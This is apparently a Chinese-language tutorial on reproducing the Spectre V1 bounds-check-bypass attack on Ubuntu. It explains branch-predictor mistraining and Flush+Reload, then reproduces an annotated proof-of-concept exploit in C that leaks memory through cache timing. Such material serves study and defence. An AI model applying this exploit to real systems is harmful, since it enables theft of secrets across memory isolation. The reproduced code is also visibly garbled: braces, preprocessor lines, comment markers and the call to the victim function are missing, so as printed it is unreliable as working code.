
环境: VMWare Ubuntu18.04


git clone https://github.com/speed47/spectre-meltdown-checker.git
cd spectre-meltdown-checker

对于Spectre V1:边界检查绕过漏洞显示"不易受影响"状态,缓解措施为“用户指针消毒”。
目前此类缓解措施是:使用修改过的编译器重新编译软件和内核,在生成的代码中的适当位置引入LFENCE操作码。这是针对编译器层面的措施。也就是说一般的GCC编译器编译生成的代码仍可发动spectre V1攻击[1]

执行Spectre V1攻击


git clone https://gitee.com/mirrors_Eugnis/spectre-attack.git
cd spectre-attack


Spectre V1原理分析


如下图:Flush共享cache使cache中不包含数组a相关内容。等待受害者访问数据后,攻击者遍历a[0 * 4096],…,a[255 * 4096],假设受害者访问过a[x*4096],此处的访问时间会明显小于其他位置。

Spectre V1:Bounds check bypass


  • 确定恶意的x值(边界检查之外的),使得array1[x]能够被解析为受害者内存中的秘密字节k;
  • array1_size和array2未在cache中,k在cache中;
  • 预训练使用合法的x值误导分支预测器(mistrain branch prediction),是它总是预测为taken。


  • 设置设置 x = (address of a secret byte to read) − (base address of array1)
  • 读array1_size时cache miss,访问memory产生延迟,因此需要较长时间才能确定分支结果;
  • 预测执行将array1[x]的地址解析为base address of array1 + x,即address of a secret byte to read,读取secret byte k,cache hit;
  • 预测逻辑执行使用k计算array2[k * 4096]的地址,并访问内存(cache miss)获取该地址数据;
  • 处理器检测到misprediction,恢复寄存器状态,但array2[ k * 4096]的数据已经被写入cache。

Flush + Reload阶段:

  • 攻击者测试array2的哪一个数据被读入cache;
  • 依次访问array2[mix_i * 4096],比较不同mix_i的值对应的访问时间;
  • 时间很小则说明此mix_i对应的array2[mix_i * 4096]在攻击阶段被写入cache,即k = mix_i

Spectre V1 attack 代码分析



#include <stdio.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#include <x86intrin.h> /* for rdtscp and clflush */

/* sscanf_s only works in MSVC. sscanf should work with other compilers*/
#ifndef _MSC_VER
#define sscanf_s sscanf

Victim code.
unsigned int array1_size = 16;
uint8_t unused1[64];
//uint8_t 定义array1的每个元素1字节,memory中一个地址空间存储1 byte,即8 bits数据,对应一个ASCII值
uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
uint8_t unused2[64];
//缓存行:a cache line = 64 bytes = 512 bits
uint8_t array2[256 * 512];

char* secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */

void victim_function(size_t x)
	if (x < array1_size)
		temp &= array2[array1[x] * 512];

Analysis code
//设置cache hit的周期阈值
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
	static int results[256];
	int tries, i, j, k, mix_i;
	unsigned int junk = 0;
	size_t training_x, x;
	register uint64_t time1, time2;
	volatile uint8_t* addr;

	for (i = 0; i < 256; i++)
		results[i] = 0;
	for (tries = 999; tries > 0; tries--)
		//uint8_t array2[256 * 512];clflush m8:清除包含地址m8的cache line。
		for (i = 0; i < 256; i++)
			_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
		training_x = tries % array1_size;
		for (j = 29; j >= 0; j--)
			for (volatile int z = 0; z < 100; z++)
			} /* Delay (can also mfence) */
			/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
			/* Avoid jumps in case those tip off the branch predictor */
			//j x x x对应输出:29 0 0 training_x,28 0 0 training_x,...,24 -65536 -1 malicious_x,...
			x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
			x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
			x = training_x ^ (x & (malicious_x ^ training_x));
			/* Call the victim! */
		/* Time reads. Order is lightly mixed up to prevent stride prediction */
		for (i = 0; i < 256; i++)
			//mix_i随机取遍0~255,为了防止stride prediction,对顺序轻微混淆
			mix_i = ((i * 167) + 13) & 255;
			addr = &array2[mix_i * 512];
			time1 = __rdtscp(&junk); /* READ TIMER */
			//访问array2[mix_i * 512]
			junk = *addr; /* MEMORY ACCESS TO TIME */
			time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
			//若访问时间小于cache hit阈值,array1[malicious_x]=mix_i的分数+1
			if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
				results[mix_i]++; /* cache hit - add +1 to score for this value */
		j = k = -1;
		for (i = 0; i < 256; i++)
			if (j < 0 || results[i] >= results[j])
				k = j;j = i;
			else if (k < 0 || results[i] >= results[k])
				k = i;
		if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
			break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
	results[0] ^= junk; /* use junk so code above won't get optimized out*/
	value[0] = (uint8_t)j;
	score[0] = results[j];
	value[1] = (uint8_t)k;
	score[1] = results[k];

int main(int argc, const char* * argv)
	printf("Putting '%s' in memory, address %p\n", secret, (void *)(secret));
	//malicious_x=0x55fbca790f28-0x55fbca992040 = -2101544
	size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
	int score[2], len = strlen(secret);
	uint8_t value[2];

	for (size_t i = 0; i < sizeof(array2); i++)
		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
	if (argc == 3)
		sscanf_s(argv[1], "%p", (void * *)(&malicious_x));
		malicious_x -= (size_t)array1; /* Convert input value into a pointer */
		sscanf_s(argv[2], "%d", &len);
		printf("Trying malicious_x = %p, len = %d\n", (void *)malicious_x, len);

	printf("Reading %d bytes:\n", len);
	while (--len >= 0)
		//最初malicious_x=-2101544,转2进制10 0000 0001 0001 0010 1000
		//取补码:1101 1111 1110 1110 1101 1000,即0xffffffffffdfeed8
		printf("Reading at malicious_x = %p... ", (void *)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
		printf("0x%02X='%c' score=%d ", value[0],
		       (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X='%c' score=%d)", value[1],
				   (value[1] > 31 && value[1] < 127 ? value[1] : '?'),
#ifdef _MSC_VER
	printf("Press ENTER to exit\n");
	getchar();	/* Pause Windows console */
	return (0);


[1] https://zhuanlan.zhihu.com/p/457630674
[2] 源码:https://gitee.com/mirrors_Eugnis/spectre-attack?_from=gitee_search
[3] 论文: Spectre Attacks: Exploiting Speculative Execution


